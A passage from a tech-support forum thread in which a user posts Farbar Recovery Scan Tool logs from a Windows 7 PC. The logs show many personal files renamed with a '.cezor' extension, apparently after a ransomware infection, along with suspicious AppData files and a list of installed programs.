    2019-07-09 15:36 - 2016-07-25 20:15 - 000002101 _____ C:\Users\ADMIN\Downloads\skin_20160725105808133381.png.cezor
    2019-07-09 15:36 - 2016-07-11 20:32 - 000093081 _____ C:\Users\ADMIN\Downloads\Mineshafter-launcher.jar.cezor
    2019-07-09 15:36 - 2016-07-06 18:58 - 000010014 _____ C:\Users\ADMIN\Documents\TIME TABLE.xlsx.cezor
    2019-07-09 15:36 - 2016-07-05 21:08 - 020035861 _____ C:\Users\ADMIN\Downloads\ModernHD 1.9.zip.cezor
    2019-07-09 15:36 - 2016-07-01 19:46 - 000024807 _____ C:\Users\ADMIN\Downloads\185133A (1).pdf.cezor
    2019-07-09 15:36 - 2016-07-01 19:44 - 000024807 _____ C:\Users\ADMIN\Downloads\185133A.pdf.cezor
    2019-07-09 15:36 - 2016-06-26 19:32 - 000059422 _____ C:\Users\ADMIN\Downloads\login.htm.cezor
    2019-07-09 15:36 - 2016-03-23 22:18 - 000016430 _____ C:\Users\ADMIN\Downloads\13955967-256-k517643.jpg.cezor
    2019-07-09 15:36 - 2016-03-23 22:17 - 000218092 _____ C:\Users\ADMIN\Downloads\bts-suga2.jpg.cezor
    2019-07-09 15:36 - 2016-03-23 22:17 - 000024953 _____ C:\Users\ADMIN\Downloads\QbTFgOTN.jpg.cezor
    2019-07-09 15:36 - 2016-03-23 22:16 - 000038625 _____ C:\Users\ADMIN\Downloads\29362-suga-zdyb.jpg.cezor
    2019-07-09 15:36 - 2016-03-22 14:09 - 000181288 _____ C:\Users\ADMIN\Downloads\4Dgpl0E.png.cezor
    2019-07-09 15:36 - 2016-03-22 13:39 - 000117301 _____ C:\Users\ADMIN\Downloads\aesthetic-green-grunge-pastel-Favim.com-2704161.jpg.cezor
    2019-07-09 15:36 - 2016-03-21 09:38 - 021586206 _____ C:\Users\ADMIN\Downloads\GihosoftAndroidRecoveryTrial5.2 (1).exe.cezor
    2019-07-09 15:36 - 2016-03-21 09:30 - 025377006 _____ C:\Users\ADMIN\Downloads\JihosoftAndroidRecoveryTrial8.2.exe.cezor
    2019-07-09 15:36 - 2016-03-21 09:11 - 021586206 _____ C:\Users\ADMIN\Downloads\GihosoftAndroidRecoveryTrial5.2.exe.cezor
    2019-07-09 15:36 - 2016-03-21 08:11 - 044957262 _____ C:\Users\ADMIN\Downloads\android-recovery.exe.cezor
    2019-07-09 15:36 - 2016-03-20 14:11 - 1078690994 _____ C:\Users\ADMIN\Downloads\Hyper Projection Performance Haikyuu!!.mkv.cezor
    2019-07-09 15:36 - 2016-03-19 22:21 - 000017402 _____ C:\Users\ADMIN\Downloads\Hyper Projection Performance Haikyuu!!.torrent.cezor
    2019-07-09 15:36 - 2016-03-19 17:26 - 000097206 _____ C:\Users\ADMIN\Downloads\RechargeReceiptTataDocomo.pdf.cezor
    2019-07-09 15:36 - 2016-03-19 08:05 - 027386358 _____ C:\Users\ADMIN\Downloads\AdbeRdr920_en_US.exe.cezor
    2019-07-09 15:36 - 2016-03-19 08:05 - 000018318 _____ C:\Users\ADMIN\Downloads\INV-101009500618-MARCH-2016.html.cezor
    2019-07-09 15:36 - 2016-03-17 20:21 - 010518509 _____ C:\Users\ADMIN\Documents\exoo.pptx.cezor
    2019-07-09 15:36 - 2016-03-17 19:51 - 027515982 _____ C:\Users\ADMIN\Downloads\CollageMaker3.8 (1).msi.cezor
    2019-07-09 15:36 - 2016-03-17 19:50 - 027515982 _____ C:\Users\ADMIN\Downloads\CollageMaker3.8.msi.cezor
    2019-07-09 15:36 - 2016-03-11 16:01 - 006978413 _____ C:\Users\ADMIN\Downloads\Pokemon - Emerald Version (U).zip.cezor
    2019-07-09 15:36 - 2016-03-11 15:59 - 000401944 _____ C:\Users\ADMIN\Downloads\Pokemon Black - Special Palace Edition 1 by MB Hacks (Red Hack) Goomba V2.2.zip.cezor
    2019-07-09 15:36 - 2016-03-11 15:51 - 000180266 _____ C:\Users\ADMIN\Downloads\NoGBA 2.6a-1614.zip.cezor
    2019-07-09 15:36 - 2016-03-11 15:48 - 000971059 _____ C:\Users\ADMIN\Downloads\Pokemon Emerald.zip.cezor
    2019-07-09 15:36 - 2016-03-11 15:39 - 006706482 _____ C:\Users\ADMIN\Downloads\1649 - Pokemon Emerald (J)(Independent).zip.cezor
    2019-07-09 15:36 - 2016-03-10 20:11 - 000969662 _____ C:\Users\ADMIN\Downloads\RobloxPlayerLauncher (1).exe.cezor
    2019-07-09 15:36 - 2016-03-08 18:37 - 454371946 _____ C:\Users\ADMIN\Downloads\Free! seiyuu event (subtitled) (convert-video-online.com).mp4.cezor
    2019-07-09 15:36 - 2016-03-08 18:36 - 000267373 _____ C:\Users\ADMIN\Downloads\Free! -Eternal Summer- Bunkasai.***.cezor
    2019-07-09 15:36 - 2016-03-07 16:41 - 000117091 _____ C:\Users\ADMIN\Downloads\fbf585a967c451f11e110d172503c432_burned.png.cezor
    2019-07-09 15:36 - 2016-03-02 14:23 - 000174771 _____ C:\Users\ADMIN\Downloads\250895_burned.png.cezor
    2019-07-09 15:36 - 2016-02-25 10:32 - 004234160 _____ C:\Users\ADMIN\Downloads\3,2,1 GO !.mp3.cezor
    2019-07-09 15:36 - 2016-02-21 10:14 - 003812857 _____ C:\Users\ADMIN\Downloads\Seum Dero - Flow.mp3.cezor
    2019-07-09 15:36 - 2016-02-13 12:37 - 105455132 _____ C:\Users\ADMIN\Downloads\Minions-2015-HDTS-1-HD.avi.cezor
    2019-07-09 15:36 - 2016-02-13 12:32 - 124017058 _____ C:\Users\ADMIN\Downloads\Minions-2015-HDTS.3gp.cezor
    2019-07-09 15:36 - 2016-02-12 21:26 - 004270941 _____ C:\Users\ADMIN\Downloads\San Holo - We Rise.mp3.cezor
    2019-07-09 15:36 - 2016-02-12 10:30 - 002599940 _____ C:\Users\ADMIN\Downloads\Minions remix banana.mp3.cezor
    2019-07-09 15:36 - 2016-02-09 15:19 - 003201801 _____ C:\Users\ADMIN\Downloads\Mark Vank & Miza - New Era (Voldex Remix).mp3.cezor
    2019-07-09 15:36 - 2016-02-05 20:56 - 003475146 _____ C:\Users\ADMIN\Downloads\OWN SONG!! -- Iggy - Troxx.mp3.cezor
    2019-07-09 15:36 - 2016-01-31 19:09 - 001962825 _____ C:\Users\ADMIN\Downloads\night_lights_buildings_railway_station_ueno_tokyo_59511_3840x1200.jpg.cezor
    2019-07-09 15:36 - 2016-01-28 19:59 - 004876981 _____ C:\Users\ADMIN\Downloads\Sex Whales & Roee Yeger - Where Was I (feat. Ashley Apollodor) [NCS Release].mp3.cezor
    2019-07-09 15:36 - 2016-01-26 17:18 - 001606117 _____ C:\Users\ADMIN\Documents\amekshirmi.docx.cezor
    2019-07-09 15:36 - 2016-01-24 17:06 - 003425411 _____ C:\Users\ADMIN\Downloads\Pitbull - Timber ft. Ke$ha.mp3.cezor
    2019-07-09 15:36 - 2016-01-08 14:42 - 000358852 _____ C:\Users\ADMIN\Downloads\photo_0160090905bucsen.jpg.cezor
    2019-07-09 15:36 - 2016-01-07 21:17 - 147456688 _____ C:\Users\ADMIN\Downloads\LeoRPGSetup.exe.cezor
    2019-07-09 15:36 - 2015-12-31 18:30 - 008209163 _____ C:\Users\ADMIN\Downloads\Ogar-windows-9bec584 (4).exe.cezor
    2019-07-09 15:36 - 2015-12-31 18:29 - 008209163 _____ C:\Users\ADMIN\Downloads\Ogar-windows-9bec584 (3).exe.cezor
    2019-07-09 15:36 - 2015-12-28 14:14 - 000052182 _____ C:\Users\ADMIN\Downloads\Agar Minions - Silver package [BY - GAMELION].rar.cezor
    2019-07-09 15:36 - 2015-12-25 21:22 - 000248710 _____ C:\Users\ADMIN\Downloads\Firefox Setup Stub 43.0.2.exe.cezor
    2019-07-09 15:36 - 2015-12-24 12:13 - 000000677 _____ C:\Users\ADMIN\Downloads\agarplus (1).user.js.cezor
    2019-07-09 15:36 - 2015-12-24 12:12 - 000000677 _____ C:\Users\ADMIN\Downloads\agarplus.user.js.cezor
    2019-07-09 15:36 - 2015-12-24 09:33 - 000000687 _____ C:\Users\ADMIN\Downloads\agarelite.user.js.cezor
    2019-07-09 15:36 - 2015-12-22 11:59 - 003666030 _____ C:\Users\ADMIN\Downloads\Ogar-master (1).zip.cezor
    2019-07-09 15:36 - 2015-12-19 20:40 - 008209163 _____ C:\Users\ADMIN\Downloads\Ogar-windows-9bec584 (2).exe.cezor
    2019-07-09 15:36 - 2015-12-19 20:37 - 008209163 _____ C:\Users\ADMIN\Downloads\Ogar-windows-9bec584 (1).exe.cezor
    2019-07-09 15:36 - 2015-12-19 20:35 - 008818766 _____ C:\Users\ADMIN\Downloads\hamachi.msi.cezor
    2019-07-09 15:36 - 2015-12-19 20:24 - 003183744 _____ C:\Users\ADMIN\Downloads\Ogar-master.zip.cezor
    2019-07-09 15:36 - 2015-12-19 20:16 - 008209163 _____ C:\Users\ADMIN\Downloads\Ogar-windows-9bec584.exe.cezor
    2019-07-09 15:36 - 2015-12-14 21:53 - 000039062 _____ C:\Users\ADMIN\Downloads\953781C6FDBAD6D0E57BC395CC36ED8BFE025B79.torrent.cezor
    2019-07-09 15:36 - 2015-12-13 21:56 - 000002593 _____ C:\Users\ADMIN\Downloads\Skin %23670673.png.cezor
    2019-07-09 15:36 - 2015-12-08 18:29 - 002424910 _____ C:\Users\ADMIN\Downloads\E30F.tmp.cezor
    2019-07-09 15:36 - 2015-12-05 15:10 - 049268612 _____ C:\Users\ADMIN\Downloads\LIFE 128x (Vers. 81).zip.cezor
    2019-07-09 15:36 - 2015-11-27 20:01 - 066933225 _____ C:\Users\ADMIN\Downloads\Minecraft launcher Team Extreme.rar.cezor
    2019-07-09 15:36 - 2015-11-26 20:11 - 000019264 _____ C:\Users\ADMIN\Downloads\76B303D91A107F9EB8E78A19E166BE9C3C0F9834.torrent.cezor
    2019-07-09 15:36 - 2015-11-20 13:00 - 000969662 _____ C:\Users\ADMIN\Downloads\RobloxPlayerLauncher.exe.cezor
    2019-07-09 15:36 - 2015-11-14 21:58 - 000016876 _____ C:\Users\ADMIN\Downloads\07db74-JobsV (1).rar.cezor
    2019-07-09 15:36 - 2015-11-14 21:53 - 000662175 _____ C:\Users\ADMIN\Downloads\ScriptHookV_1.0.505.2a (1).zip.cezor
    2019-07-09 15:36 - 2015-11-14 21:50 - 000662175 _____ C:\Users\ADMIN\Downloads\ScriptHookV_1.0.505.2a.zip.cezor
    2019-07-09 15:36 - 2015-11-12 21:17 - 185404150 _____ C:\Users\ADMIN\Downloads\GTAV_Setup_Tool.exe.cezor
    2019-07-09 15:36 - 2015-11-12 18:20 - 000008580 _____ C:\Users\ADMIN\Downloads\GN31OH4.png.cezor
    2019-07-09 15:36 - 2015-11-11 22:04 - 000016876 _____ C:\Users\ADMIN\Downloads\07db74-JobsV.rar.cezor
    2019-07-09 15:36 - 2015-11-11 12:31 - 000172432 _____ C:\Users\ADMIN\Downloads\b1fbfd-AnimalArkShelter1.2.zip.cezor
    2019-07-09 15:36 - 2015-11-08 17:39 - 002141021 _____ C:\Users\ADMIN\Downloads\One Direction - Drag Me Down (pictures + Lyrics).mp3.cezor
    2019-07-09 15:36 - 2015-11-08 17:22 - 003228134 _____ C:\Users\ADMIN\Downloads\Party In The USA lyrics.mp3.cezor
    2019-07-09 15:36 - 2015-11-07 13:47 - 075858190 _____ C:\Users\ADMIN\Downloads\AdbeRdr11010_en_US.exe.cezor
    2019-07-09 15:36 - 2015-11-07 13:47 - 043485206 _____ C:\Users\ADMIN\Downloads\Firefox Setup 43.0b1.exe.cezor
    2019-07-09 15:36 - 2015-11-07 13:47 - 037460940 _____ C:\Users\ADMIN\Downloads\K-Lite_Codec_Pack_1155_Full.exe.cezor
    2019-07-09 15:36 - 2015-11-07 11:28 - 000584366 _____ C:\Users\ADMIN\Downloads\jxpiinstall(1).exe.cezor
    2019-07-09 15:36 - 2015-11-07 11:24 - 000584366 _____ C:\Users\ADMIN\Downloads\jxpiinstall.exe.cezor
    2019-07-09 15:36 - 2015-11-07 11:21 - 300325630 _____ C:\Users\ADMIN\Downloads\358.87-desktop-win8-win7-winvista-64bit-international-whql.exe.cezor
    2019-07-09 15:36 - 2015-11-07 09:11 - 002530486 _____ C:\Users\ADMIN\Downloads\setup-lightshot.exe.cezor
    2019-07-09 15:35 - 2016-03-21 08:15 - 000000000 ____D C:\Users\ADMIN\.android
    2019-07-09 15:35 - 2015-11-07 11:26 - 000000000 ____D C:\Users\ADMIN\.oracle_jre_usage
    2019-07-08 16:36 - 2016-10-22 07:16 - 000000632 __RSH C:\Users\ADMIN\ntuser.pol
    2019-07-08 16:36 - 2015-11-07 13:41 - 000000000 ____D C:\Users\ADMIN
    2019-07-08 16:18 - 2015-11-07 13:42 - 000000000 ____D C:\Users\ADMIN\AppData\Local\VirtualStore
    2019-07-08 16:13 - 2009-07-14 08:50 - 000000000 ___HD C:\Windows\system32\GroupPolicy
    2019-07-08 16:12 - 2019-03-31 00:14 - 000001932 _____ C:\Users\ADMIN\Desktop\Internet Explorer.lnk
    2019-07-08 16:12 - 2018-02-28 21:09 - 000002230 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
    2019-07-08 16:12 - 2016-12-04 09:34 - 000002267 _____ C:\Users\children\Desktop\Google Chrome.lnk
    2019-07-08 16:12 - 2016-10-22 14:23 - 000001431 _____ C:\Users\children\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
    2019-07-08 16:12 - 2015-11-07 13:49 - 000000000 ____D C:\Program Files\NVIDIA Corporation
    2019-07-08 16:12 - 2015-11-07 13:42 - 000001431 _____ C:\Users\ADMIN\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
    2019-07-06 20:54 - 2015-11-07 11:25 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
    2019-07-06 20:54 - 2015-11-07 11:25 - 000000000 ____D C:\Program Files (x86)\Java
    2019-07-06 20:53 - 2015-11-07 11:25 - 000099192 _____ (Oracle Corporation) C:\Windows\SysWOW64\WindowsAccessBridge-32.dll
    2019-07-06 20:51 - 2015-11-07 11:25 - 000000000 ____D C:\ProgramData\Oracle
    2019-07-03 20:20 - 2019-03-05 15:13 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Roblox
    2019-07-03 20:20 - 2018-08-17 12:46 - 000001315 _____ C:\Users\ADMIN\Desktop\Roblox Player.lnk
    2019-07-03 20:20 - 2018-08-17 12:46 - 000001134 _____ C:\Users\ADMIN\Desktop\Roblox Studio.lnk
    2019-06-29 20:43 - 2017-01-04 18:49 - 000000000 ____D C:\Users\ADMIN\AppData\Roaming\.minecraft
    2019-06-25 15:06 - 2019-05-15 15:30 - 000000000 ____D C:\Program Files (x86)\Minecraft Launcher
    2019-06-25 14:57 - 2018-07-05 16:30 - 000000000 ____D C:\Users\ADMIN\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Roblox
    2019-06-19 19:50 - 2019-02-26 11:45 - 000000000 ____D C:\Users\ADMIN\AppData\Local\BitTorrentHelper

    ==================== Files in the root of some directories ================

    2019-07-08 16:20 - 2019-07-09 18:11 - 000256608 _____ () C:\Users\ADMIN\AppData\Roaming\appdata.dat
    2019-02-16 14:31 - 2019-02-16 14:31 - 000249337 _____ () C:\Users\ADMIN\AppData\Roaming\Babesog
    2019-07-03 14:50 - 2019-07-03 14:50 - 000196533 _____ () C:\Users\ADMIN\AppData\Roaming\Beguk
    2019-06-17 12:50 - 2019-06-17 12:50 - 000337779 _____ () C:\Users\ADMIN\AppData\Roaming\Bopirolifeb
    2019-04-08 13:13 - 2019-04-08 13:13 - 000329578 _____ () C:\Users\ADMIN\AppData\Roaming\Fobacapekilu
    2019-06-09 11:31 - 2019-06-09 11:31 - 000297976 _____ () C:\Users\ADMIN\AppData\Roaming\Fubarum
    2019-03-31 00:13 - 2019-03-31 00:13 - 000291119 _____ () C:\Users\ADMIN\AppData\Roaming\Gerepokuf
    2019-06-25 14:31 - 2019-06-25 14:31 - 000250751 _____ () C:\Users\ADMIN\AppData\Roaming\Gisigo
    2019-03-22 13:13 - 2019-03-22 13:13 - 000182941 _____ () C:\Users\ADMIN\AppData\Roaming\Koceramo
    2019-05-07 11:49 - 2019-05-07 11:49 - 000144507 _____ () C:\Users\ADMIN\AppData\Roaming\Lepicufip
    2019-07-08 16:20 - 2019-07-09 16:00 - 000000001 _____ () C:\Users\ADMIN\AppData\Roaming\lsa64.log
    2019-05-24 10:50 - 2019-05-24 10:50 - 000319443 _____ () C:\Users\ADMIN\AppData\Roaming\Mifebe
    2019-02-07 13:54 - 2019-02-07 13:54 - 000243427 _____ () C:\Users\ADMIN\AppData\Roaming\Mumimehohil
    2019-06-01 10:50 - 2019-06-01 10:50 - 000268555 _____ () C:\Users\ADMIN\AppData\Roaming\Netab
    2019-04-28 13:13 - 2019-04-28 13:13 - 000193750 _____ () C:\Users\ADMIN\AppData\Roaming\Nocekerotacu
    2019-03-14 11:13 - 2019-03-14 11:13 - 000295864 _____ () C:\Users\ADMIN\AppData\Roaming\Racadebul
    2019-05-15 12:31 - 2019-05-15 12:31 - 000180383 _____ () C:\Users\ADMIN\AppData\Roaming\Rolecunotif
    2019-03-05 12:31 - 2019-03-05 12:31 - 000180839 _____ () C:\Users\ADMIN\AppData\Roaming\Sokacapo
    2019-02-25 12:31 - 2019-02-25 12:31 - 000153706 _____ () C:\Users\ADMIN\AppData\Roaming\Suhec
    2018-10-29 14:31 - 2019-07-10 17:13 - 000000413 _____ () C:\Users\ADMIN\AppData\Roaming\WB.CFG
    2019-07-08 16:11 - 2019-07-08 16:11 - 007942656 _____ () C:\Users\ADMIN\AppData\Local\agent.dat
    2019-07-08 16:11 - 2019-07-08 16:11 - 000054272 _____ () C:\Users\ADMIN\AppData\Local\ApplicationHosting.dat
    2019-05-24 19:11 - 2019-05-24 19:55 - 000000126 _____ () C:\Users\ADMIN\AppData\Local\Autosofted License.txt
    2019-07-08 16:11 - 2019-07-08 16:11 - 000070992 _____ () C:\Users\ADMIN\AppData\Local\Config.xml
    2019-07-08 16:11 - 2019-07-08 16:11 - 002039119 _____ () C:\Users\ADMIN\AppData\Local\Don-Sing.tst
    2019-07-08 16:11 - 2019-07-08 16:11 - 000072787 _____ () C:\Users\ADMIN\AppData\Local\GreenZuntouch.tst
    2019-07-08 16:11 - 2019-07-08 16:11 - 000016416 _____ () C:\Users\ADMIN\AppData\Local\InstallationConfiguration.xml
    2019-07-08 16:11 - 2019-07-08 16:11 - 000140800 _____ () C:\Users\ADMIN\AppData\Local\installer.dat
    2019-07-08 16:11 - 2019-07-08 16:11 - 000126464 _____ () C:\Users\ADMIN\AppData\Local\lobby.dat
    2019-07-08 16:11 - 2019-07-08 16:11 - 000018432 _____ () C:\Users\ADMIN\AppData\Local\Main.dat
    2019-07-08 16:11 - 2019-07-08 16:11 - 000005568 _____ () C:\Users\ADMIN\AppData\Local\md.xml
    2019-07-08 16:11 - 2019-07-08 16:11 - 000126464 _____ () C:\Users\ADMIN\AppData\Local\noah.dat
    2019-07-08 16:11 - 2019-07-08 16:38 - 000722944 _____ () C:\Users\ADMIN\AppData\Local\sha.db
    2019-07-08 16:12 - 2019-07-08 16:12 - 000032038 _____ () C:\Users\ADMIN\AppData\Local\uninstall_temp.ico
    2015-11-07 09:12 - 2015-11-07 09:12 - 000000003 _____ () C:\Users\ADMIN\AppData\Local\updater.log
    2015-11-07 09:12 - 2017-05-10 13:06 - 000000425 _____ () C:\Users\ADMIN\AppData\Local\UserProducts.xml
    2019-07-08 16:12 - 2019-07-08 16:12 - 001895383 _____ () C:\Users\ADMIN\AppData\Local\Villalux.bin

    ==================== SigCheck ===============================

    (There is no automatic fix for files that do not pass verification.)


    LastRegBack: 2019-07-04 18:19
    ==================== End of FRST.txt ============================
     
  5. nekoshoyo

    nekoshoyo Thread Starter

    Joined:
    Jul 9, 2019
    Messages:
    12
    And heres Addition.txt:

    Additional scan result of Farbar Recovery Scan Tool (x64) Version: 3-07-2019
    Ran by ADMIN (10-07-2019 17:34:07)
    Running from C:\Users\ADMIN\Desktop
    Windows 7 Ultimate (X64) (2015-11-07 08:11:11)
    Boot Mode: Normal
    ==========================================================


    ==================== Accounts: =============================

    ADMIN (S-1-5-21-3161437104-263828448-1275724104-1000 - Administrator - Enabled) => C:\Users\ADMIN
    Administrator (S-1-5-21-3161437104-263828448-1275724104-500 - Administrator - Disabled)
    children (S-1-5-21-3161437104-263828448-1275724104-1003 - Limited - Enabled) => C:\Users\children
    Guest (S-1-5-21-3161437104-263828448-1275724104-501 - Limited - Disabled)
    HomeGroupUser$ (S-1-5-21-3161437104-263828448-1275724104-1002 - Limited - Enabled)

    ==================== Security Center ========================

    (If an entry is included in the fixlist, it will be removed.)

    AV: Malwarebytes (Enabled - Up to date) {23007AD3-69FE-687C-2629-D584AFFAF72B}
    AS: Malwarebytes (Enabled - Up to date) {98619B37-4FC4-67F2-1C99-EEF6D47DBD96}
    AS: Windows Defender (Disabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

    ==================== Installed Programs ======================

    (Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

    µTorrent (HKU\S-1-5-21-3161437104-263828448-1275724104-1000\...\uTorrent) (Version: 3.5.5.45283 - BitTorrent Inc.)
    µTorrent (HKU\S-1-5-21-3161437104-263828448-1275724104-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-07102019161655023\...\uTorrent) (Version: 3.5.5.45283 - BitTorrent Inc.)
    µTorrent (HKU\S-1-5-21-3161437104-263828448-1275724104-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-07102019161702413\...\uTorrent) (Version: 3.5.5.45283 - BitTorrent Inc.)
    Adobe Acrobat Reader DC (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}) (Version: 18.011.20063 - Adobe Systems Incorporated)
    Bandicam MPEG-1 Decoder (HKLM-x32\...\BandiMPEG1) (Version: - Bandicam.com)
    BingProvidedSearch (HKLM-x32\...\{07F6EF36-5776-3EB6-E6F6-4E3636769DB6}) (Version: - )
    Chromium (HKLM-x32\...\{1A7EF2BE-4AFE-233E-FB7E-53BE2BFE803E}) (Version: - )
    Collage Maker (HKLM-x32\...\{05F2884D-89AC-4DE4-A63D-7DB3FE3398DC}) (Version: 3.80 - Galleria Software)
    Epic Games Launcher (HKLM-x32\...\{6F15D7C1-3079-4135-B8E9-8D3EA033EE3A}) (Version: 1.1.129.0 - Epic Games, Inc.)
    Epic Games Launcher Prerequisites (x64) (HKLM\...\{66C5838F-B854-4A55-89E6-A6138747A4DF}) (Version: 1.0.0.0 - Epic Games, Inc.) Hidden
    Google Chrome (HKLM-x32\...\Google Chrome) (Version: 75.0.3770.100 - Google LLC)
    Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.34.11 - Google LLC) Hidden
    Grand Theft Auto V (HKLM-x32\...\{E01FA564-2094-4833-8F2F-1FFEC6AFCC46}) (Version: "1.00.0000" - Rockstar Games)
    IGdm 2.6.5 (HKU\S-1-5-21-3161437104-263828448-1275724104-1000\...\1ead4f81-c61a-5fa6-9e81-7a8c0c868952) (Version: 2.6.5 - ifedapo olarewaju)
    IGdm 2.6.5 (HKU\S-1-5-21-3161437104-263828448-1275724104-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-07102019161655023\...\1ead4f81-c61a-5fa6-9e81-7a8c0c868952) (Version: 2.6.5 - ifedapo olarewaju)
    IGdm 2.6.5 (HKU\S-1-5-21-3161437104-263828448-1275724104-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-07102019161702413\...\1ead4f81-c61a-5fa6-9e81-7a8c0c868952) (Version: 2.6.5 - ifedapo olarewaju)
    Java 8 Update 211 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F32180211F0}) (Version: 8.0.2110.12 - Oracle Corporation)
    Jihosoft Android Phone Recovery version 5.2.0.1 (HKLM-x32\...\{01F86EE4-6518-4BB2-8D11-0039134A6376}_is1) (Version: 5.2.0.1 - HONGKONG JIHO CO., LIMITED)
    K-Lite Codec Pack 11.5.5 Full (HKLM-x32\...\KLiteCodecPack_is1) (Version: 11.5.5 - )
    Launcher Prerequisites (x64) (HKLM-x32\...\{c6c5a357-c7ca-4a5f-9789-3bb1af579253}) (Version: 1.0.0.0 - Epic Games, Inc.) Hidden
    League of Legends (HKLM-x32\...\{E80C09B5-A296-47E9-BD4B-BCCF2FDCA13E}) (Version: 4.1.2 - Riot Games) Hidden
    League of Legends (HKLM-x32\...\League of Legends 4.1.2) (Version: 4.1.2 - Riot Games)
    LeoRPG version 1.0.1.6 (HKLM-x32\...\{8D66928D-58E4-4E51-96BE-931E7BC2F9DB}_is1) (Version: 1.0.1.6 - DamenSpike GAMES HQ)
    Lightshot-5.4.0.35 (HKLM-x32\...\{30A5B3C9-2084-4063-A32A-628A98DE512B}_is1) (Version: 5.4.0.35 - Skillbrains)
    Logitech Gaming Software 9.02 (HKLM\...\Logitech Gaming Software) (Version: 9.02.65 - Logitech Inc.)
    MacroRecorder v1.0.67 (HKLM-x32\...\MacroRecorder_is1) (Version: 1.0.67 - Bartels Media GmbH)
    Malwarebytes version 3.8.3.2965 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 3.8.3.2965 - Malwarebytes)
    Microsoft Chart Controls for Microsoft .NET Framework 3.5 (HKLM-x32\...\{41785C66-90F2-40CE-8CB5-1C94BFC97280}) (Version: 3.5.0.0 - Microsoft Corporation)
    Microsoft Office Professional Plus 2013 (HKLM\...\Office15.PROPLUS) (Version: 15.0.4420.1017 - Microsoft Corporation)
    Microsoft Visual C++ 2005 Redistributable - x64 8.0.61000 (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
    Microsoft Visual C++ 2005 Redistributable - x86 8.0.61001 (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
    Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
    Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
    Microsoft Visual C++ 2010 Redistributable - x64 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
    Microsoft Visual C++ 2010 Redistributable - x86 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
    Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.60610 (HKLM-x32\...\{a1909659-0a08-4554-8af1-2175904903a1}) (Version: 11.0.60610.1 - Microsoft Corporation)
    Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{a2199617-3609-410f-a8e8-e8806c73545b}) (Version: 11.0.61030.0 - Корпорация Майкрософт)
    Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.60610 (HKLM-x32\...\{95716cce-fc71-413f-8ad5-56c2892d4b3a}) (Version: 11.0.60610.1 - Microsoft Corporation)
    Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{f0080ca2-80ae-4958-b6eb-e8fa916d744a}) (Version: 11.0.61030.0 - Корпорация Майкрософт)
    Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
    Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
    Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24212 (HKLM-x32\...\{323dad84-0974-4d90-a1c1-e006c7fdbb7d}) (Version: 14.0.24212.0 - Microsoft Corporation)
    Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24212 (HKLM-x32\...\{462f63a8-6347-4894-a1b3-dbfe3a4c981d}) (Version: 14.0.24212.0 - Microsoft Corporation)
    Minecraft Launcher (HKLM-x32\...\{E154B2C8-2F3E-4763-B3D5-E7D34AE39C6B}) (Version: 1.0.0.0 - Mojang)
    Minecraft1.6.2 (HKLM-x32\...\Minecraft1.6.2) (Version: - )
    MyStart Toolbar (HKLM-x32\...\mystarttb) (Version: 5.5.0.2 - Visicom Media Inc.)
    NVIDIA Graphics Driver 334.89 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 334.89 - NVIDIA Corporation)
    NVIDIA Update 11.10.13 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Update) (Version: 11.10.13 - NVIDIA Corporation)
    Online Application (HKLM-x32\...\{5266F634-7B7D-4537-BDDC-98DD6CFCBAA1}) (Version: 2.7.0 - Microleaves) Hidden <==== ATTENTION
    Origin (HKLM-x32\...\Origin) (Version: 10.5.38.25027 - Electronic Arts, Inc.)
    Outils de vérification linguistique 2013 de Microsoft Office - Français (HKLM\...\{90150000-001F-040C-1000-0000000FF1CE}) (Version: 15.0.4420.1017 - Microsoft Corporation) Hidden
